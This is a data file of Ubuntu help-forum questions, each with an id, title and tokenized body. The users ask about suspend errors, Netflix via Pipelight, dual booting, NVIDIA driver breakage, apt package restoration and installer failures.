503955	/sys is mounted read-only and this stops my laptop from suspending to ram	my laptop has recently started to fail to suspend to ram from time to time . i 've completely re-installed kubuntu 14.04 ( trusty ) , but the error comes back intermittently . looking at /var/log/pm-powersave.log i see entries like this : running hook /usr/lib/pm-utils/power.d/pci_devices false : setting host bridge 0000:00:00.0 to on /usr/lib/pm-utils/power.d/pci_devices : 30 : /usr/lib/pm-utils/power.d/pci_devices : can not create /sys/bus/pci/devices/0000:00:00.0/powe r/control : read-only file system setting ethernet device 0000:00:19.0 to on /usr/lib/pm-utils/power.d/pci_devices : 18 : /usr/lib/pm-utils/power.d/pci_devices : can not create /sys/bus/pci/devices/0000:00:19.0/powe r/control : read-only file system setting audio device 0000:00:1b.0 to on /usr/lib/pm-utils/power.d/pci_devices : 26 : /usr/lib/pm-utils/power.d/pci_devices : can not create /sys/bus/pci/devices/0000:00:1b.0/powe r/control : read-only file system setting card reader device 0000:02:00.0 to on /usr/lib/pm-utils/power.d/pci_devices : 38 : /usr/lib/pm-utils/power.d/pci_devices : can not create /sys/bus/pci/devices/0000:02:00.0/powe r/control : read-only file system setting wireless device 0000:03:00.0 to on /usr/lib/pm-utils/power.d/pci_devices : 22 : /usr/lib/pm-utils/power.d/pci_devices : can not create /sys/bus/pci/devices/0000:03:00.0/powe r/control : read-only file system /usr/lib/pm-utils/power.d/pci_devices false : success . mount however shows this : sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) i 've not found anything different that i 'm running on the machine between when it suspends and when it does n't . nothing new has been plugged into it either . what might be causing it to report a read only sys filesystem ? is there some way that i can try to remount /sys so that maybe it will be marked as read/write again ?
503956	centos/rhel 5.10 repository on ubuntu 14.04	i have an ubuntu 14.04 kickstart server for my rhel/centos deployements . this kickstart server also servers as a yum server . i am able to use the below switches of createrepo command to make this work till rhel 5.9 but these are not working for rhel 5.10 createrepo -- checksum sha anyone else is in a similar situation ?
503958	slow ( wired ) internet in terminal and software center ubuntu 14.04	new ubuntu user here . i am dual booting with windows 8.1 , and in 8.1 i have no issues . in ubuntu , i noticed extremely slow download speeds while downloading packages and it seems to also occur in the software center . for example , i just ran apt-get upgrade and downloaded a 15mb file in 5m @ 54.9kb/s . i have n't noticed browsing ( in firefox ) to be slow , and in fact speedtest.net returned similar results to what i see in windows ( ~20mb down and 4.5mb up ) . i 've read in some places where certain applications can cause internet to slow down , but i do n't know if that is the case here . i 've run the `` host www.google.com '' command that i 've read other recommend and the results were returned very quickly . i am not sure if i actually have a problem ( and if so how to diagnose and resolve ) or if i 'm having bad luck . one issue i experience when installing ubuntu , which may or may not be related , is ubuntu did n't seem to like any devices plugged into a certain sata controller ( i.e . when plugged in , i could not boot to liveusb but when i unplugged it i could ) . i 'm wondering if there 's some chipset issue that is extending to what i am experiencing now . more likely , i have no idea what i 'm talking about . any help is appreciated .
503964	watching netflix on ubuntu 14.04	when i attempt to install pipelight , an error message displays on the terminal : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : pipelight-multi : depends : ttf-mscorefonts-installer but it is not installable e : unable to correct problems , you have held broken packages . i follow these directions : sudo add-apt-repository ppa : pipelight/stable sudo apt-get update sudo apt-get install -- install-recommends pipelight-multi sudo pipelight-plugin -- update when i attempt to enter the third command , it then displays that error above . i 've been using ubuntu for a few days now so , i 'm still getting acclimated with everything . any suggestions or tips would be very helpful . thank you .
503970	understanding ubuntu	i understand that linux is an open source os , in other words i have the ability to change whatever i want with the source code of the system . where is the source code located ? for example i would like to add a new event to the mouse which let the user logout when the mouse pointer is moved left then right . can someone provide me with some lessons or anything that would me to understand how changes to the source code happens ?
503972	can not get into my admin account ? says the account does not exist when i try to change to change the password ?	i tried to go and change the psswd but it says the admin account does not exist ? i changed the system password but i still can not get into the admin account and it 's driving me up the wall . is there some way i can add another admin account and delete the first one ?
503975	netflix desktop not working	could someone help me with netflix on ubuntu 14.04 desktop . pipelight does not work . when i go to the netflix desktop application it opens firefox , and shows the series , but when i click to play a screen appears telling me : you 're almost ready and only need to install the microsoft silverlight plugin . pipelight itself is installed and enabled but i saw in the window on the desktop opens netflix portion plugins complements the pipelight appears with this error pipelight error ( silverlight5.1 ) ! something went wrong , check the terminal output libpipelight-silverlight5.1.so application/x-pipelight-error-silverlight5.1 ( error during initialization : pipelighterror-silverlight5.1 ) if i open firefox by other plugins and see the pipelight okay , this error does not appear .
503976	installing plex media sever unofficial appstore ?	looking to install the unofficial appstore from plex to add some oher channels . i just installed ubuntu 14.04 lts . i ; ve been trying so many things . i got the zip to download into the plexmediaserver plugin folder but when i try to install/unzip the package it says permission denied . i tried it with sudo but it never went through . does anyone have anything that worked for them ? edit : my install method . i downloaded the ubuntu package from plex website https : //plex.tv/ i then went into the terminal and did the usual sudo get-apt and plex installed on my system . i added the usual channels from plex site to my server and now i have them on my tv ( through a roku 3 ) . i had windows 7 and had the plex server on that . there is a specific channel called the unofficial appstore . this is where there are more channels , ie . reddit full movies channel , adult movies channel , etc . just extras that pplex does not consider official . now in order to get the channel on windows & i just downloaded the zip file and windows did the rest . for ubuntu i was reading to do it i had to download , save to plex plugins file , unzip , change ownership and it shoudl be complete . i was about to get the `` master.zip '' downloaded ffrom github.com/mikedm139/unsupportedappstore.bundle into my plex plug in folder . i opened a terminal and tried the commands i found online at http : //www.reddit.com/r/plex/comments/1utl0a/plex_plugins_in_ubuntu_1204/ i got it to unzip as in it looked like it was loading in the termial but after that it keeps saying no permission even when i use sudo .
503981	ubuntu 14.04 lts not booting after once i boot into windows	recently i installed ubuntu 14.04 on my dell inspiron n5010 . dual boot is working fine . i tried to get boot options for windows 7 and ubuntu and i am able to boot into both os . but there is one problem when i boot into windows , then restart the system and try to boot into ubuntu , i am getting black screen and system fails to boot ubuntu . now if i boot using ubuntu recovery mode and fix the grub then i am able to boot ubuntu normally . if you keep on booting ubuntu from this point onwards then everything works fine until i boot windows . now if i try to boot into ubuntu after turning windows off i am again facing the black screen . any solutions for this issue ?
503982	why do n't i see network manager icon on the gnome top bar ?	i just started using ubuntu gnome 14.04 lts . from the 'help ' application i see that there ought to be certain icons if i am using a wired connection on my gnome top bar as shown below : but there is n't any ! i see only a couple of icons on my top bar as shown below : so how to get those icons on my top bar ? i ca n't right click on the top bar too ! i am not able to know if i am connected to the internet without this . i ought to enter my browser and search for google or something to know if i am connected . so need help here ! ps : - btw i see that there are n't many icons on my top bar . is this normal ? am i missing any other default icons ? if yes can you tell how to get those ? btw i have libappindicator 1 and libappindicator 3-1 installed . so , that should n't be a problem . also i tried this but it did n't work . let me also add that i changed to a different icon theme too but that also did n't help ( presently using numix-circle theme ) . the default tweak tool also does n't seem to have any options to solve this issue of mine .
503984	my wifi blinking light	( gedit:19011 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files i have a hp compaq notebook 6530b and i have ubuntu 14.04 and my wifi keeps blinking . when i save this options iwlcore led_mode=1 i get this message
503991	reinstallation troubles	i currently have ubuntu 14.04 and mainly use windows 7 . i do n't know what partitioning is and i do n't know how ubuntu was originally installed on my computer . all i know is that the 14.04 is very buggy and wo n't even boot properly . so i just downloaded another ubuntu 14.04 iso file and burned it to a dvd . now i want to uninstall my current ubuntu and install it again using the cd . the problem is , i do n't know how . i read a thread that said to download minitool partition wizard home edition to get rid of ubuntu but it did n't say anything else . when i run the wizard i get this image and i 'm too scared to change anything . so here is my main problem in case i was n't clear . i want to install ubuntu 14.04 alongside my windows 7 . to do this , i need to uninstall my current buggy ubuntu then install ubuntu again from a cd . how do i uninstall my current buggy ubuntu ?
503993	after installing gnome , desktop folder does n't appear on my desktop	after installing gnome on my 14.04 system running unity , my desktop folder ( ~/desktop ) does n't appear on my desktop any-more . i only see the splash background that says 14.04 lts in lower right hand corner . i have tried reinstalling unity and ubuntu-desktop but did not help . after the gnome installation my startup screen when the machine boots also says ubuntu gnome , which is not wat i was expecting . ( i only installed gnome for x2go to work . ) this installation was upgraded from 12.04 also running unity
503995	question regarding a domain name ending with `` ubuntu ''	i 'm building a website like omg ! ubuntu . i know that when using domain names ending with `` ubuntu '' i must get consent from canonical . how do i get their consent ?
503996	why it 's dual uefi boot manger for uefi ubuntu os	after installing ubuntu 64bit uefi image with the csm disable setting , i have two entries in the boot menu . these two entries show the same name : ubuntu : xxxxxxx . i ca n't find any difference between them , are they the same or is there a difference ?
504003	how to install virtual ti-85	i was learning some physics stuff khan academy in which i saw they are using ti-85 complex calculator . i saw a link in the comment box on how to install it , added by user but unfortunately it was for windows . how can i install it on ubuntu 14.04 ?
504004	is there a command line or some other way to bring up nm-applet ui ?	folks , environment : ubuntu 14.04 in my current environment , nm-applet icon can be seen in the panel ( as expected ) . i can right-click on it and bring up its ui . i need to trigger the same ui from within my application . is there a command line tool i can run to bring up this ui ? or , perhaps there is a message i can send to the panel to force-display the ui ? thank you in advance for your help . regards , peter
504005	sound broke after update	when i run gmusicbrowser , parole , etc the sound stops working after 5-10 min . before system update ( 26.07.2014 ) sound worked good . how to repair it ? xubuntu 14.04 , samsung 550p5c .
504008	openshot crashes when opening saved project	i worked on a project with openshot ... saved it ... when i try to open it , openshot grey out and open saved file for just a friction of second and then crashes . it does that every time i try to open the file . how can i open it ? i 'm using openshot 1.4.3 on ubuntu 14.04 ( gnome flashback session ) . saved project had some m2ts videos ( from sony camcorder ) + jpg files + mp3 music file + titles .
504019	where to change default < super > + < space > keyboard switch key by a terminal ?	since 14.04 default keyboard switch key is super+space i preparing sample system for clone on hundreds of pc 's and want to assign another default keys to switch layout with command line . i can not find where this setting is defined in 14.04 . i search /etc , dconf , gconf but can not find any appropriate configuration in fresh install of ubuntu 14.04 . also i want to manage this setting with chef for supporting idempotent configuration in future . so i need to know where it 's stored . help me to find where it 's stored .
504026	is there any medium to easily backup my files in ubuntu ?	i would like to know about how to easily backup my files .
504027	how can i achieve more control over my xfce keyboard shortcuts ?	xfce has a great keyboard commands editor in the window manager keyboard settings area . i can change the commands that open or close windows or move to workspaces etc . but it is a bit lacking . what if i want the search prompt from alt+f2 to be called up by the home key instead ? or what if i want the media button on my keyboard to launch my default media app etc ?
504029	`apt-get` suggests i remove `xinit` , how do i deal with that ?	i just updated my 32-bit ubuntu 12.04 to 64-bit version by taking the following steps : made a tarball of my home ( not really important ) saved dpkg -- get-selections made a tarball of /etc/apt format and install latest 64-bit ubuntu 12.04 overwrite home with the old home ( again , not important ) overwrite /etc/apt and to reinstall the old applications , i tried following from here , so i did : $ sudo apt-get install dselect $ sudo dpkg -- set-selections < ~/package.list $ sudo apt-get dselect-upgrade but , that was asking me to remove a lot of 64-bit packages and install the 32-bit versions of them . i did n't quite figure out how to reset the selection , so i just went ahead and uninstalled dselect . then i decided to go with a more manual method . having the old dpkg -- get-selections output ( call the file packages ) , i did the following : # take packages marked as deinstall $ awk '/deinstall/ { print $ 1 } ' < packages > deinstall # and remove them $ while read p ; do sudo apt-get remove `` $ p '' -y ; done < deinstall the removed packages were nothing weird . in fact , they were : appmenu-gtk appmenu-gtk3 asymptote indicator-appmenu libfltk-cairo1.3 libfltk-gl1.3 libgc1c2 libgsl0ldbl liboverlay-scrollbar-0.2-0 liboverlay-scrollbar3-0.2-0 libsigsegv2 libubuntuoneui-3.0-1 then i did the same to install old packages ( here i realized invoking apt-get install per package is too slow , so i did them all together ) : # take packages marked as install $ awk '/\tinstall/ { print $ 1 } ' < packagespackages > install # and install them $ xargs sudo apt-get install -y < install however , before doing that , i removed the packages that started with x , to make sure it does n't do anything with x . doing this , it still told me some x related packages would be removed , but at the same time it said some other x related packages would be installed , so i let it do it . finally , what happened is the following : on restart , x did n't run . trying failsafex said that /usr/bin/x does not exist . following its suggestions , i did : $ cd /usr/bin ; ln -s xorg x on restart , x ran ok and everything is ok . when i do something with apt-get , it tells me that : the following packages were automatically installed and are no longer required : x11-apps libwayland-ltss-server0 xserver-xorg-input-vmmouse x11-session-utils appmenu-qt xserver-xorg-input-evdev x11-xfs-utils libxrandr-ltss2 xserver-xorg-input-wacom xinit xserver-xorg-input-mouse libxcb-xfixes0 libwayland-ltss-client0 xserver-xorg-input-synaptics libllvm3.3 so here 's my question . should i remove those packages ? how can i make sure i have alternative packages so everything would work ok on restart ? if i should n't remove these packages , how can i make apt understand that the system depends on them ?
504032	how to install gmp 4.3.2 on ubuntu 14.04	i want to install gcc-4.4.3 , for which i have to install gmp 4.3.2 . when i run : ./configure make i get this error . can you help me ? make all-recursive make [ 1 ] : entering directory `/home/abc/downloads/gmp-4.2.3' making all in tests make [ 2 ] : entering directory `/home/abc/downloads/gmp-4.2.3/tests' making all in . make [ 3 ] : entering directory `/home/abc/downloads/gmp-4.2.3/tests' make [ 3 ] : nothing to be done for `all-am ' . make [ 3 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/tests' making all in devel make [ 3 ] : entering directory `/home/abc/downloads/gmp-4.2.3/tests/devel' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/tests/devel' making all in mpn make [ 3 ] : entering directory `/home/abc/downloads/gmp-4.2.3/tests/mpn' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/tests/mpn' making all in mpz make [ 3 ] : entering directory `/home/abc/downloads/gmp-4.2.3/tests/mpz' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/tests/mpz' making all in mpq make [ 3 ] : entering directory `/home/abc/downloads/gmp-4.2.3/tests/mpq' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/tests/mpq' making all in mpf make [ 3 ] : entering directory `/home/abc/downloads/gmp-4.2.3/tests/mpf' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/tests/mpf' making all in rand make [ 3 ] : entering directory `/home/abc/downloads/gmp-4.2.3/tests/rand' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/tests/rand' making all in misc make [ 3 ] : entering directory `/home/abc/downloads/gmp-4.2.3/tests/misc' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/tests/misc' making all in cxx make [ 3 ] : entering directory `/home/abc/downloads/gmp-4.2.3/tests/cxx' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/tests/cxx' making all in mpbsd make [ 3 ] : entering directory `/home/abc/downloads/gmp-4.2.3/tests/mpbsd' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/tests/mpbsd' make [ 2 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/tests' making all in mpn make [ 2 ] : entering directory `/home/abc/downloads/gmp-4.2.3/mpn' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/mpn' making all in mpz make [ 2 ] : entering directory `/home/abc/downloads/gmp-4.2.3/mpz' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/mpz' making all in mpq make [ 2 ] : entering directory `/home/abc/downloads/gmp-4.2.3/mpq' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/mpq' making all in mpf make [ 2 ] : entering directory `/home/abc/downloads/gmp-4.2.3/mpf' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/mpf' making all in printf make [ 2 ] : entering directory `/home/abc/downloads/gmp-4.2.3/printf' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/printf' making all in scanf make [ 2 ] : entering directory `/home/abc/downloads/gmp-4.2.3/scanf' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/scanf' making all in cxx make [ 2 ] : entering directory `/home/abc/downloads/gmp-4.2.3/cxx' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/cxx' making all in mpbsd make [ 2 ] : entering directory `/home/abc/downloads/gmp-4.2.3/mpbsd' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/mpbsd' making all in demos make [ 2 ] : entering directory `/home/abc/downloads/gmp-4.2.3/demos' making all in calc make [ 3 ] : entering directory `/home/abc/downloads/gmp-4.2.3/demos/calc' make all-am make [ 4 ] : entering directory `/home/abc/downloads/gmp-4.2.3/demos/calc' make [ 4 ] : nothing to be done for `all-am ' . make [ 4 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/demos/calc' make [ 3 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/demos/calc' making all in expr make [ 3 ] : entering directory `/home/abc/downloads/gmp-4.2.3/demos/expr' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/demos/expr' make [ 3 ] : entering directory `/home/abc/downloads/gmp-4.2.3/demos' make [ 3 ] : nothing to be done for `all-am ' . make [ 3 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/demos' make [ 2 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/demos' making all in tune make [ 2 ] : entering directory `/home/abc/downloads/gmp-4.2.3/tune' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/tune' making all in doc make [ 2 ] : entering directory `/home/abc/downloads/gmp-4.2.3/doc' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/abc/downloads/gmp-4.2.3/doc' make [ 2 ] : entering directory `/home/abc/downloads/gmp-4.2.3' make [ 2 ] : leaving directory `/home/abc/downloads/gmp-4.2.3' make [ 1 ] : leaving directory `/home/abc/downloads/gmp-4.2.3'
504035	bluetooth mouse stopped after update	we are running 12.04 lts 32 bit . i recently updated some system stuff - drivers ? - without taking much notice of what i was doing ( there are sooooo many updates each week , i tend to ignore the details ) . anyway , our microsoft bluetooth mouse is now not working . the bluetooth control panel thingy says that bluetooth is on but disabled . we are lost . how can we enable this and/or reinstall the drivers ? thanks
504038	game display is n't centered	whenever i play a game using wine the game is off centered or zoomed into the top left corner of the game.how do i fix this ?
504039	my ethernet interface card is not detected with `` ifconfig -a ''	i do not see my ethernet interface card with ifconfig . i tried ifconfig eth0 up and the message returned : no such device should i require root access to set up ethernet interface ? the output of ifconfig -a is ananth @ tandvl0021-lenovo-g580 : ~ $ ifconfig -a lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2416 errors:0 dropped:0 overruns:0 frame:0 tx packets:2416 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:322214 ( 322.2 kb ) tx bytes:322214 ( 322.2 kb ) wlan0 link encap : ethernet hwaddr 08 : ed : b9 : a0:66:7b inet addr:192.168.1.8 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :aed : b9ff : fea0:667b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:20894 errors:0 dropped:0 overruns:0 frame:0 tx packets:21426 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:19399726 ( 19.3 mb ) tx bytes:3142329 ( 3.1 mb )
504040	embedded youtube video not working	as the title says , embedded videos are not working . i can however play youtube videos from the youtube site . i have a recently installed ubuntu 14.04 with all the updates using the latest versions of firefox and flashplayer plug-in . i have tried the same web page in opera and it wo n't work either . however , everything is working perfectly on puppy linux with nightly ( firefox ) 16.0.1 and using adobe flashplayer plugin 10.3.183 is this an ubuntu problem or a firefox problem or an adobe problem ? computer is an older pentium 4 . maybe ubuntu 14.04 is too new for it ?
504041	problem in wifi connection	i have two laptops . one has windows 8 , the other one has ubuntu 14.04 . when i use windows , i do n't have any problem connecting to the wifi , but when i use ubuntu from time to time all of a sudden i get disconnected . i have to restart the laptop to get connected again .
504043	ubuntu release upgrade from 13.10 to 14.04 fails - log-in fails	upgrading ubuntu to upgrade from ubuntu 13.10. to 14.04 . i ran sudo do-release-upgrade . the first attempt failed and i found the following message in the error log : /var/log/dist-upgrade/20140724-1529/main.log : error dist-upgrade failed : 'the package 'postgresql-9.3-postgis-2.1 ' is marked for removal but it is in the removal blacklist . ' after i successfully uninstalled the package i re-ran the upgrade . the initial problem i restarted the computer and then it stops booting with the following screen output : * starting nginx nginx speech-dispatcher disabled ; edit /etc/default/speech-dispatcher starting virtualbox kernel modules ... done . saned disabled ; edit /etc/default/saned * restoring resolver state * starting web server apache2 * trying to start the ui from the console i tried to launch the ui running : sudo service lightdm start which fails with the message : job failed to start looking into /var/log/lightdm/ i found the following errors : x-0-greeter.log : warning : can not open pixbuf loader module file '/usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0 \ /2.10.0/loaders.cache ' : datei oder verzeichnis nicht gefunden . this likely means that your installation is broken try running the command gdk-pixbuf-query-loaders > /usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders.cache \ to make thinks work again for the time being warning : error loading image 'file : ///usr/share/themes/ambiance/gtk-3.0/assets/entry.png ' : format der bilddatei unbekannt warning : error loading image 'file : ///usr/share/themes/ambiance/gtk-3.0/assets/ \ entry-disabled.png ' : format der bilddatei unbekannt /usr/sbin/unity-greeter : symbol lookup error : /usr/lib/x86_64-linux-gnu/libgdk-3.so.0 : undefined symbol : cairo_surface_set_device_scale ** ( gnome-settings-daemon:2614 ) : warning ** : could not open x display .. x-0.log : loading extension glx modprobe : error : ../libkmod/libkmod-module.c:809 kmod_module_insert_module ( ) could not find module by name='nvidia_311' modprobe : error : could not insert 'nvidia_331 ' : function not implemented error setting mtrr ( base = 0xf3000000 , size = 0x00e00000 , type = 1 ) invalid argument ( 22 ) graphics driver some weeks ago i switched to another graphics driver as described here . as suggested here i downloaded the current nvidia driver for my graphics card from their website and run the following and run : sudo ./nvidia-linux-x86_64-331.79.run however , the setup stops with the following message : the distribution-provides pre-install script failed ! continue installation anyway ? [ yes ] [ no ] i have chose no for now . running apt-get next i decided to run sudo apt-get -f install . in the middle of something it stopped with the following message : setting up nvidia-331 ( 331.38-0ubuntu7 ) ... configuration file '/etc/init/nvidia-persistenced.conf' == > deleted ( by you or by a script ) since installation . == > package distributor has shipped an updated version . what would you like to do about it ? your options are : y or i : install the package maintainer 's version n or o : keep your currently-installed version d : show the differences between the versions z : start a shell to examine the situation the default action is to keep your current version . *** nvidia-persistenced , conf ( y/i/n/o/d/z ) [ default=n ] ? i chosen y since i was n't lucky with what was installed as you might guess.. partial success rebooting the system the ui launched ! however , when i enter my password to the log-in field nothing happens . also the log-in field looks somewhat odd - the user name is barely readable - as if the background graphic is missing ( see screen foto ) . then i run sudo apt-get install -- reinstall ubuntu-session and restarted one again . now i can log-in . the problem which remains : the window manager seems to be broken . i can not see the unity dash , window menu bars , ... graphics driver nightmare second part meanwhile , i decided to install the driver mentioned before regardless of the warnings : sudo ./nvidia-linux-x86_64-331.79.run now , the system boots : i can see the shell login prompt for a second but no ui and the screen stays black . when i press the power button the system shuts down ( i can see the routines ) . i can no longer access the shell via ctrl+alt+f1 . seems as if i messed it up : ( recovered to the previous state ( no menu bars ) by adding the attribute text to the kernel parameters as suggested by bain . errors or warnings in /var/log/syslog /var/log/syslog : jul 30 09:28:23 e6500 kernel : [ 186.883606 ] traps : compiz [ 2666 ] trap int3 ip:7f97c4279c13 sp:7fff48a43bf0 error:0 jul 30 09:28:25 e6500 gnome-session [ 2560 ] : warning : application 'compiz.desktop ' killed by signal 5 jul 30 09:28:25 e6500 gnome-session [ 2560 ] : warning : app 'compiz.desktop ' respawning too quickly jul 30 09:28:25 e6500 gnome-session [ 2560 ] : critical : we failed , but the fail whale is dead . sorry ... . jul 30 09:28:26 e6500 kernel : [ 189.550661 ] traps : compiz [ 3059 ] trap int3 ip:7fb39f46ec13 sp:7fff38ee5170 error:0 jul 30 09:28:26 e6500 gnome-session [ 2560 ] : warning : app 'compiz.desktop ' respawning too quickly jul 30 09:28:26 e6500 gnome-session [ 2560 ] : warning : application 'compiz.desktop ' killed by signal 5 jul 30 09:28:26 e6500 gnome-session [ 2560 ] : warning : app 'compiz.desktop ' respawning too quickly
504044	delay while recording the video using epiphan vga2usb frame grabber	hi this is my first question on this portal . i am using epiphan vga2usb frame grabber for capturing output from virtually any vga sourceâsuch as a windows pc , a mac osx , a unix machine . i also used two different cameras for recording purpose . all three devices are working fine and also recording properly . after recording the videos i am combine videos side by side and making one single video . now i have a situation as , if i attach the vga2usb device to other vga device after starting the video then it is adding some delay in the videos . if vga2usb device is already attached then it does n't add any delay . for combining i am using ffmpeg commands . so i have a following questions how this delay is adding . how can i remove this delay .
504046	how to permanently remove a charm from the juju charms store ?	i have already added a charm in juju charms store . now i want to remove from the charms store . can anyone explain how to do this ?
504049	network split screen	i 've got a pc with the newest ubuntu installed and 2 laptops . is it possible to split the screen of the pc over network to the 2 laptops ( and the standard monitor of the pc which i normally use ) ? thank you for your answer .
504050	is it possible to install ubuntu from iso on virtual windows drive instead of burning a dvd ?	i have downloaded the iso file of ubuntu 14.04.1 . it has wubi ( windows installer ) in it . i was wondering whether i can mount the iso file onto a virtual drive ( say using osfmount ) ( http : //www.osforensics.com/tools/mount-disk-images.html ) and install from there rather thank burning a dvd . vs
504052	ubuntu 14.04 installer does not detect windows on drive , missing `` install alongside '' option	firstly some information about my computer . i just have a c : drive and a d : drive . my c : drive just has a bunch of programs and my d : drive has all my work . i am running windows 7 and i 'm trying to also have ubuntu on my desktop too . i burned a ubuntu14.04.1.iso file onto a dvd . then i rebooted my desktop and changed my boot options to boot from the dvd . it loaded ubuntu and asked me to pick my language etc etc but then these dialogs came up and i did n't know what to choose ... i did n't want to pick the first option because i was scared it might delete my windows or something so i clicked on something else and got this window . now from this window i had no idea what was going on so i just quit the installation , took the dvd out and went back to windows . how am i supposed to proceed ? i remember seeing a post that said i should get an option like this , which allows me to install ubuntu with windows 7 but i never got it . any help is appreciated .
504055	ubuntu 14.04 not installing , popup error ? ? ? at `` where are you ? ''	i 'm having an issue trying to install ubuntu 14.04 . when booting up the cd , i select `` install ubuntu '' which is fine , however the problem occurs each time i arrive at the `` where are you ? '' screen when choosing your geographic location . i select my location and i always get a pop-up with the following error message ; ? ? ? ? ? ? literally , that is all it shows ! i 've tried installing using a usb stick too and the same thing occurs at the same bit . it also happens on 13.10 as well . eachtime i select ok on the error message , i am taking back to the start of the installation again . any ideas ? i am using a hp microserver n40l . syslog /var/log/partman /var/log/installer/debug /var/log/installer/debug exception caught in process_line : traceback ( most recent call last ) : file `` /usr/lib/ubiquity/ubiquity/filteredcommand.py '' , line 145 , in process_line return self.dbfilter.process_line ( ) file `` /usr/lib/ubiquity/ubiquity/debconffilter.py '' , line 430 , in process_line data = self.db.command ( command , *params ) file `` /usr/lib/python3/dist-packages/debconf.py '' , line 66 , in command self.write.write ( `` % s % s\n '' % ( command , ' '.join ( map ( str , params ) ) ) ) valueerror : i/o operation on closed file . /var/log/syslog /dev/mapper/pdc_eajbihdagf errors jul 29 10:58:30 ubuntu activate-dmraid : enabling dmraid support . jul 29 10:58:30 ubuntu dmraid-activate : error : can not retrieve raid set information for pdc_eajbihdagf jul 29 10:58:30 ubuntu dmraid-activate : error : can not retrieve raid set information for pdc_eajbihdagf jul 29 10:58:31 ubuntu kernel : [ 87.667498 ] xor : measuring software checksum speed jul 29 10:58:31 ubuntu kernel : [ 87.706052 ] prefetch64-sse : 6157.000 mb/sec jul 29 10:58:31 ubuntu kernel : [ 87.746058 ] generic_sse : 5808.000 mb/sec jul 29 10:58:31 ubuntu kernel : [ 87.746062 ] xor : using function : prefetch64-sse ( 6157.000 mb/sec ) jul 29 10:58:31 ubuntu kernel : [ 87.834089 ] raid6 : sse2x1 2173 mb/s jul 29 10:58:31 ubuntu kernel : [ 87.902132 ] raid6 : sse2x2 3197 mb/s jul 29 10:58:31 ubuntu kernel : [ 87.970134 ] raid6 : sse2x4 4002 mb/s jul 29 10:58:31 ubuntu kernel : [ 87.970138 ] raid6 : using algorithm sse2x4 ( 4002 mb/s ) jul 29 10:58:31 ubuntu kernel : [ 87.970141 ] raid6 : using intx1 recovery algorithm jul 29 10:58:31 ubuntu kernel : [ 88.023211 ] bio : create slab < bio-3 > at 3 jul 29 10:58:31 ubuntu kernel : [ 88.023698 ] btrfs loaded jul 29 10:58:31 ubuntu kernel : [ 88.093940 ] jfs : ntxblock = 8192 , ntxlock = 65536 jul 29 10:58:31 ubuntu kernel : [ 88.171643 ] sgi xfs with acls , security attributes , realtime , large block/inode numbers , no debug enabled jul 29 10:58:31 ubuntu partman : no matching physical volumes found jul 29 10:58:31 ubuntu partman : reading all physical volumes . this may take a while ... jul 29 10:58:31 ubuntu partman : no volume groups found jul 29 10:58:31 ubuntu partman-lvm : no volume groups found jul 29 10:58:34 ubuntu ubiquity : tune2fs : bad magic number in super-block while trying to open /dev/mapper/pdc_eajbihdagf jul 29 10:58:34 ubuntu ubiquity : could n't find valid filesystem superblock . jul 29 10:58:34 ubuntu partman : error running 'tune2fs -l /dev/mapper/pdc_eajbihdagf' ubiquity errors jul 29 12:04:19 ubuntu ubiquity [ 10648 ] : switched to page timezone jul 29 12:04:20 ubuntu ubiquity [ 10648 ] : geoname lookup for `` new york '' failed : 2 can not resolve 